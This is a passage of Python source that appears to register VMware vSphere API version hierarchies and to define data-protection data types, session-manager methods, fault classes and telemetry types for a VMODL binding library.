AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version13")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version14")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version15")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version10")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version11")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version12")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version8")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version9")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version6")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version7")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version4")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version5")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version3")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.VSAN_DeltaCompEnsureDurability")
# Register every compatibility parent of the "vim.version.bmcInfo" API
# version namespace (a version is always listed as its own parent).
# Data-driven loop form of the original unrolled AddVersionParent calls:
# same child, same parents, same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.bmcInfo",
):
    AddVersionParent("vim.version.bmcInfo", _parent)
# Register every compatibility parent of the "vim.version.disabled" API
# version namespace. Unlike the base-version groups, this one also
# inherits from every feature-switch version (a version is always
# listed as its own parent). Loop form of the original unrolled
# AddVersionParent calls: same child, same parents, same order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.pcieHotPlugOfFPT",
    "vim.version.pr1429825",
    "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT",
    "vim.version.MemoryTiering",
    "vim.version.v7_0_1_1",
    "vim.version.FCD_VRA_SUPPORT",
    "vim.version.guestDetailedData",
    "vim.version.SGX_MPA_VMCheck",
    "vim.version.vdcs",
    "vmodl.version.version0",
    "vim.version.NFS_VMKPORTBIND",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.VMC_NFS_SUPPORT",
    "vim.version.NsxLiveUpdate",
    "vim.version.VDS_ReadOnlyDisk",
    "vim.version.v7_0_0_2",
    "vim.version.vVol_datastore_scalability",
    "vim.version.AssignHwCompositeDev",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.VQAT",
    "vim.version.VCDP_NestedFilters",
    "vim.version.nativeSnapshot",
    "vim.version.hostProfiles",
    "vim.version.GraphicsDRS",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.hwh",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.VSAN2_Configure",
    "vim.version.DRS_LB_REASONCODE",
    "vim.version.gosCrashRemediation",
    "vim.version.VCSOF_173",
    "vim.version.pciSriovExtendedID",
    "vim.version.vmxnet3UPT",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.VMcrypt_IntegrityProtection",
    "vim.version.version12",
    "vim.version.pciDeviceExt",
    "vim.version.toolsOffHost",
    "vim.version.hostCertificateManagement",
    "vim.version.vmMisc",
    "vim.version.VLCM_QuickLaunchPreload",
    "vim.version.LSI2PVSCSI",
    "vim.version.ProvisioningEventRefresh",
    "vim.version.OVF_SINGLEDEPLOY_API",
    "vim.version.v7_0_2_0",
    "vim.version.pr1803450",
    "vim.version.v7_0_2_1",
    "vim.version.VMcrypt_OnlineVMEncryption",
    "vim.version.FT_VBS_SUPPORT",
    "vim.version.WCP_FaultDomains",
    "vim.version.dnd",
    "vim.version.optional_virtual_disks",
    "vim.version.hwh2_0",
    "vim.version.v7_0_1_0",
    "vim.version.VM_OP_NOTIFICATION_TO_APP_V1",
    "vim.version.EventsOrdering",
    "vim.version.PMemV2",
    "vim.version.v7_0",
    "vim.version.FileLockInfo_GSS34",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.DiskGroupVMC",
    "vim.version.TrustAuthority_V4",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.SRIOVValidNumVFs",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.NDU_VSPHERE_HA_INTEGRATION",
    "vim.version.VmxRebootPowerOff",
    "vim.version.ClusteredEsx_V1",
    "vim.version.fourKnStorageSupport",
    "vim.version.resetportstatistics",
    "vim.version.batchRenameSupport",
    "vim.version.VM_CLONE_SWITCH_HOST_EMM",
    "vim.version.SGX_MPA_HostReg",
    "vim.version.GreenMetrics",
    "vim.version.hostVendorSpecificStatus",
    "vim.version.VMcrypt_V4",
    "vim.version.hostAccessManager",
    "vim.version.ocmSupportedForReconfigure",
    "vim.version.VirtualTopo",
    "vim.version.Tools_Update_Health",
    "vim.version.CPU_Scheduler_Info",
    "vim.version.VM_CLONE_REKEY_TPM",
    "vim.version.FCD_CATALOG_HEALTH",
    "vim.version.smartnic_vc",
    "vim.version.HWv20",
    "vim.version.unstable",
    "vim.version.FT_DRS_METRO_CLUSTER",
    "vim.version.VSAN_DeltaCompEnsureDurability",
    "vim.version.bmcInfo",
    "vim.version.disabled",
    "vim.version.vHT",
    "vim.version.ClusterConfigManagerV2",
    "vim.version.smartnic_network",
    "vim.version.DVX",
    "vim.version.VmcExternalStorageSupport",
    "vim.version.PodVMOnVDS",
    "vim.version.ClusterConfigManagerTransition",
    "vim.version.LiveUpdate",
    "vim.version.Vmfs_Unmap_Ultralow_Rate",
    "vim.version.VMcrypt3_KeyCustomAttribute",
    "vim.version.E2ENativeNVMeSupport",
    "vim.version.FCD_PERFORMANCE",
    "vim.version.SPBM_DISK_PROV_VIA_POLICY",
    "vim.version.nsx_uens_u2",
):
    AddVersionParent("vim.version.disabled", _parent)
# Register every compatibility parent of the "vim.version.vHT" API
# version namespace (a version is always listed as its own parent).
# Data-driven loop form of the original unrolled AddVersionParent calls:
# same child, same parents, same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.vHT",
):
    AddVersionParent("vim.version.vHT", _parent)
# Register every compatibility parent of the
# "vim.version.ClusterConfigManagerV2" API version namespace (a version
# is always listed as its own parent). Data-driven loop form of the
# original unrolled AddVersionParent calls: same child, same parents,
# same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.ClusterConfigManagerV2",
):
    AddVersionParent("vim.version.ClusterConfigManagerV2", _parent)
# Register every compatibility parent of the
# "vim.version.smartnic_network" API version namespace (a version is
# always listed as its own parent). Data-driven loop form of the
# original unrolled AddVersionParent calls: same child, same parents,
# same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.smartnic_network",
):
    AddVersionParent("vim.version.smartnic_network", _parent)
# Register every compatibility parent of the "vim.version.DVX" API
# version namespace (a version is always listed as its own parent).
# Data-driven loop form of the original unrolled AddVersionParent calls:
# same child, same parents, same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.DVX",
):
    AddVersionParent("vim.version.DVX", _parent)
# Register every compatibility parent of the
# "vim.version.VmcExternalStorageSupport" API version namespace (a
# version is always listed as its own parent). Data-driven loop form of
# the original unrolled AddVersionParent calls: same child, same
# parents, same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.VmcExternalStorageSupport",
):
    AddVersionParent("vim.version.VmcExternalStorageSupport", _parent)
# Register every compatibility parent of the "vim.version.PodVMOnVDS"
# API version namespace (a version is always listed as its own parent).
# Data-driven loop form of the original unrolled AddVersionParent calls:
# same child, same parents, same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.PodVMOnVDS",
):
    AddVersionParent("vim.version.PodVMOnVDS", _parent)
# Register every compatibility parent of the
# "vim.version.ClusterConfigManagerTransition" API version namespace (a
# version is always listed as its own parent). Data-driven loop form of
# the original unrolled AddVersionParent calls: same child, same
# parents, same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.ClusterConfigManagerTransition",
):
    AddVersionParent("vim.version.ClusterConfigManagerTransition", _parent)
# Register every compatibility parent of the "vim.version.LiveUpdate"
# API version namespace (a version is always listed as its own parent).
# Data-driven loop form of the original unrolled AddVersionParent calls:
# same child, same parents, same registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.LiveUpdate",
):
    AddVersionParent("vim.version.LiveUpdate", _parent)
# Parent-version registrations for six feature versions.  Every feature
# version below declares exactly the same 36 ancestor versions, in the
# same order, followed by a self-registration — so the repeated call
# blocks are expressed as one shared parent tuple and a nested loop.
# Call order and arguments are identical to the expanded form.
_FEATURE_VERSION_PARENTS = (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
)
for _feature_version in (
    "vim.version.Vmfs_Unmap_Ultralow_Rate",
    "vim.version.VMcrypt3_KeyCustomAttribute",
    "vim.version.E2ENativeNVMeSupport",
    "vim.version.FCD_PERFORMANCE",
    "vim.version.SPBM_DISK_PROV_VIA_POLICY",
    "vim.version.nsx_uens_u2",
):
    for _parent in _FEATURE_VERSION_PARENTS:
        AddVersionParent(_feature_version, _parent)
    # Each feature version is also registered as its own parent.
    AddVersionParent(_feature_version, _feature_version)
# Register the "dp" (data protection) namespace version markers with the
# module-level version sets (defined earlier in the file): newest/LTS/
# dotted/oldest known versions for this namespace.
for _version_set, _version_id in (
    (newestVersions, "dp.version.unstable"),
    (ltsVersions, "dp.version.v8_0_0_0"),
    (dottedVersions, "dp.version.v8_0_0_0"),
    (oldestVersions, "dp.version.version1"),
):
    _version_set.Add(_version_id)
# --- "dp" (data protection) core VMODL data types -------------------------
# Generated registrations: CreateDataType(vmodlName, wsdlName, parentType,
# introducedInVersion, properties).  Each property tuple appears to be
# (name, type, version, flags) with 0 = required and F_OPTIONAL = optional
# — matches usage throughout this file; verify against the VMODL emitter.
CreateDataType("dp.ProtectedEntity", "DpProtectedEntity", "vmodl.DynamicData", "dp.version.version1", None)
CreateDataType("dp.ProtectedEntitySnapshot", "DpProtectedEntitySnapshot", "vmodl.DynamicData", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", [("uuid", "string", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", 0)])
CreateDataType("dp.SnapshotIdentifier", "DpSnapshotIdentifier", "vmodl.DynamicData", "dp.version.version1", None)
CreateDataType("dp.UserIdBinding", "DpUserIdBinding", "vmodl.DynamicData", "dp.version.version1", None)
CreateDataType("dp.VirtualMachineDiskSnapshot", "DpVirtualMachineDiskSnapshot", "vmodl.DynamicData", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", [("diskKey", "int", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", 0), ("snapshotUuid", "string", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", 0)])
# VM-specific specializations of ProtectedEntity / ProtectedEntitySnapshot /
# UserIdBinding (note the non-DynamicData parent types below).
CreateDataType("dp.VirtualMachineProtectedEntity", "DpVirtualMachineProtectedEntity", "dp.ProtectedEntity", "dp.version.version1", [("vmRef", "vim.VirtualMachine", "dp.version.version1", 0), ("includedDiskKeys", "int[]", "dp.version.version1", F_OPTIONAL), ("instanceUuid", "string", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.VirtualMachineProtectedEntitySnapshot", "DpVirtualMachineProtectedEntitySnapshot", "dp.ProtectedEntitySnapshot", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", [("diskSnapshots", "dp.VirtualMachineDiskSnapshot[]", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", F_OPTIONAL)])
CreateDataType("dp.VirtualMachineUserIdBinding", "DpVirtualMachineUserIdBinding", "dp.UserIdBinding", "dp.version.version1", [("diskIds", "dp.VirtualMachineUserIdBinding.DiskIdBinding[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.VirtualMachineUserIdBinding.DiskIdBinding", "DpVirtualMachineUserIdBindingDiskIdBinding", "vmodl.DynamicData", "dp.version.version1", [("diskKey", "int", "dp.version.version1", 0), ("id", "string", "dp.version.version1", 0)])
# --- "dp.dpd" managed objects ---------------------------------------------
# CreateManagedType(vmodlName, wsdlName, parentType, version, properties,
# methods).  Method tuples carry (name, wsdlName, version, params,
# (resultFlags, resultType, wsdlResultType), privilege, faults) — inferred
# from the call shapes below; confirm against the VMODL emitter.
CreateManagedType("dp.dpd.ServiceInstance", "DpdServiceInstance", "vmodl.ManagedObject", "dp.version.version1", [("content", "dp.dpd.ServiceInstanceContent", "dp.version.version1", 0, "System.Anonymous")], None)
CreateDataType("dp.dpd.ServiceInstanceContent", "DpdServiceInstanceContent", "vmodl.DynamicData", "dp.version.version1", [("about", "vim.AboutInfo", "dp.version.version1", 0), ("instanceUuid", "string", "dp.version.version1", 0), ("protectionService", "dp.ProtectionService", "dp.version.version1", 0), ("propertyCollector", "vmodl.query.PropertyCollector", "dp.version.version1", 0), ("stressOptions", "vim.option.OptionManager", "dp.version.version1", 0)])
# SessionManager: note the F_SECRET flag on the login token parameter.
CreateManagedType("dp.dpd.SessionManager", "DpdSessionManager", "vmodl.ManagedObject", "dp.version.version1", None, [("userLoginByVpSecret", "UserLoginByVpSecret", "dp.version.version1", (("token", "string", "dp.version.version1", F_SECRET, None),("locale", "string", "dp.version.version1", F_OPTIONAL, None),), (0, "void", "void"), "System.Anonymous", ["dp.fault.InvalidLogin", "dp.fault.AlreadyLoggedIn", "vim.fault.InvalidLocale", "dp.fault.NoServerCredential", ]), ("userLogout", "UserLogout", "dp.version.version1", (), (0, "void", "void"), None, None)])
# --- "dp.fault" fault type hierarchy --------------------------------------
# Two roots: DataProtectionFault (vmodl.MethodFault) and the runtime-fault
# based DataProtectionRuntimeFault / DpFault (vmodl.RuntimeFault).  Most
# concrete faults derive from dp.fault.DpFault.
CreateDataType("dp.fault.DataProtectionFault", "DpFaultDataProtectionFault", "vmodl.MethodFault", "dp.version.version1", None)
CreateDataType("dp.fault.DataProtectionRuntimeFault", "DpFaultDataProtectionRuntimeFault", "vmodl.RuntimeFault", "dp.version.version1", None)
CreateDataType("dp.fault.DpFault", "DpFaultDpFault", "vmodl.RuntimeFault", "dp.version.version1", None)
CreateDataType("dp.fault.DpdBusy", "DpFaultDpdBusy", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.FullSyncRequired", "DpFaultFullSyncRequired", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.InvalidLogin", "DpFaultInvalidLogin", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.InvalidSnapshot", "DpFaultInvalidSnapshot", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.InvalidSource", "DpFaultInvalidSource", "dp.fault.DataProtectionFault", "dp.version.version1", None)
CreateDataType("dp.fault.NoServerCredential", "DpFaultNoServerCredential", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.NotLoggedIn", "DpFaultNotLoggedIn", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.OperationInterrupted", "DpFaultOperationInterrupted", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.PeIncompleteRequest", "DpFaultPeIncompleteRequest", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.PePartiallyProtected", "DpFaultPePartiallyProtected", "dp.fault.DpFault", "dp.version.version1", None)
# QuiesceFailure carries the quiesce phase in which the failure occurred;
# the companion enum lists the valid phase values.
CreateDataType("dp.fault.QuiesceFailure", "DpFaultQuiesceFailure", "dp.fault.DpFault", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", [("quiescePhase", "string", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", 0)])
CreateEnumType("dp.fault.QuiesceFailure.GuestQuiescePhase", "DpFaultQuiesceFailureGuestQuiescePhase", "dp.version.version1", ["beginPhase", "endPhase"])
CreateDataType("dp.fault.RestoreInProgress", "DpFaultRestoreInProgress", "dp.fault.DpFault", "dp.version.version1", [("restoreId", "string", "dp.version.version1", 0)])
CreateDataType("dp.fault.SnapshotInProgress", "DpFaultSnapshotInProgress", "dp.fault.DpFault", "dp.version.version1", [("snapshotId", "string", "dp.version.version1", 0)])
CreateDataType("dp.fault.SnapshotNotFound", "DpFaultSnapshotNotFound", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.SnapshotTransportFault", "DpFaultSnapshotTransportFault", "dp.fault.DpFault", "dp.version.version1", [("transportProviderResults", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.fault.SyncInProgress", "DpFaultSyncInProgress", "dp.fault.DpFault", "dp.version.version1", [("syncId", "string", "dp.version.version1", 0)])
# --- "dp.telemetry" telemetry/statistics types ----------------------------
# TelemetryStats managed object plus its query spec and the MetricResult
# family (host / snapshot-op / sync-op specializations).  All introduced in
# dp.version.VSPHERE_DP_TELEMETRY.
CreateManagedType("dp.telemetry.TelemetryStats", "DpTelemetryTelemetryStats", "vmodl.ManagedObject", "dp.version.VSPHERE_DP_TELEMETRY", None, None)
CreateEnumType("dp.telemetry.TelemetryStats.DpdTelemetryCategory", "DpTelemetryTelemetryStatsDpdTelemetryCategory", "dp.version.VSPHERE_DP_TELEMETRY", ["general", "snapshot"])
CreateDataType("dp.telemetry.TelemetryStats.QueryMetricsSpec", "DpTelemetryTelemetryStatsQueryMetricsSpec", "vmodl.DynamicData", "dp.version.VSPHERE_DP_TELEMETRY", [("categories", "string[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("peList", "dp.ProtectedEntity[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("minMetricsUpdateTime", "vmodl.DateTime", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL)])
CreateDataType("dp.telemetry.TelemetryStats.MetricResult", "DpTelemetryTelemetryStatsMetricResult", "vmodl.DynamicData", "dp.version.VSPHERE_DP_TELEMETRY", [("csvData", "string[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("vmIndexTable", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("vdiskIndexTable", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("lwdSnapshotIndexTable", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("csvColumnIndexMap", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL)])
CreateDataType("dp.telemetry.TelemetryStats.MetricResults", "DpTelemetryTelemetryStatsMetricResults", "vmodl.DynamicData", "dp.version.VSPHERE_DP_TELEMETRY", [("hostTime", "vmodl.DateTime", "dp.version.VSPHERE_DP_TELEMETRY", 0), ("metrics", "dp.telemetry.TelemetryStats.MetricResult[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL)])
CreateDataType("dp.telemetry.TelemetryStats.HostMetricResult", "DpTelemetryTelemetryStatsHostMetricResult", "dp.telemetry.TelemetryStats.MetricResult", "dp.version.VSPHERE_DP_TELEMETRY", None)
